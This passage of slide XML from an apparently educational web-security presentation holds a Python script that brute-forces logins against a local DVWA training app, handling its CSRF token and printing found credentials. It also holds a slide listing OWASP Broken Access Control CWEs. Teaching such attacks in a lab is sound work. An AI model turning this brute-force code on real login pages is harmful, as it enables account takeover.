              <a:t>                continue</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>            print("Fuzzing ("+str(n)+"):", password, ":", username)#, end=', ')</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>            _token = getToken(r)</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>            r = s.post('http://localhost/DVWA/login.php', data={'username':username,"password":password,"Login":"Login","user_token":_token})</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>            if invalid_msg in r.content.decode():</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>                pass</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>                #print("Invalid")</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>            else:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>                #print("Success")</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>                list_of_found.append(username)</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>                found_credentials.append(username+":"+password)</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>                print("Found ({}/{}) ".format(str(len(found_credentials)), str(number_of_usernames))+username+":"+password)</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>                s,r = newSession()</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>        if len(found_credentials) &gt;= number_of_usernames:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>            break</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>        try:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>            password = password_file.readline().replace("\n", "")</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>            if not password: # compensating in case there is a missing line in the file.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>                password = password_file.readline().replace("\n", "")</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>        except:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>            break</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>except KeyboardInterrupt:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    print("Broke out of loop")</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    pass</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print()</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>print("Found credentials: ")</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>for i in found_credentials:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    print(i)</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Google Shape;519;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6581875" y="4480975"/>
            <a:ext cx="232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3"/>
              </a:rPr>
              <a:t>Code on my GitHub</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="520" name="Google Shape;520;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5944775" y="816175"/>
            <a:ext cx="2887525" cy="137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CWEs and Preventions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Broken Access Controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="39705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CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-23 Relative Path Traversal</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-35 Path Traversal: '.../...//'</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-59 Improper Link Resolution Before File Access ('Link Following')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-200 Exposure of Sensitive Information to an Unauthorized Actor</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-201 Exposure of Sensitive Information Through Sent Data</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-219 Storage of File with Sensitive Data Under Web Root</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-264 Permissions, Privileges, and Access Controls (should no longer be used)</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-275 Permission Issues</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-276 Incorrect Default Permissions</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-284 Improper Access Control</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-285 Improper Authorization</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-352 Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-359 Exposure of Private Personal Information to an Unauthorized Actor</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-377 Insecure Temporary File</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-402 Transmission of Private Resources into a New Sphere ('Resource Leak')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-425 Direct Request ('Forced Browsing')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-441 Unintended Proxy or Intermediary ('Confused Deputy')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-497 Exposure of Sensitive System Information to an Unauthorized Control Sphere</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-538 Insertion of Sensitive Information into Externally-Accessible File or Directory</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-540 Inclusion of Sensitive Information in Source Code</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-548 Exposure of Information Through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-552 Files or Directories Accessible to External Parties</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-566 Authorization Bypass Through User-Controlled SQL Primary Key</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-601 URL Redirection to Untrusted Site ('Open Redirect')</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-639 Authorization Bypass Through User-Controlled Key</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-651 Exposure of WSDL File Containing Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-668 Exposure of Resource to Wrong Sphere</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-706 Use of Incorrectly-Resolved Name or Reference</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-862 Missing Authorization</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-863 Incorrect Authorization</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-913 Improper Control of Dynamically-Managed Code Resources</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-922 Insecure Storage of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-1275 Sensitive Cookie with Improper SameSite Attribute</a:t>
            </a:r>
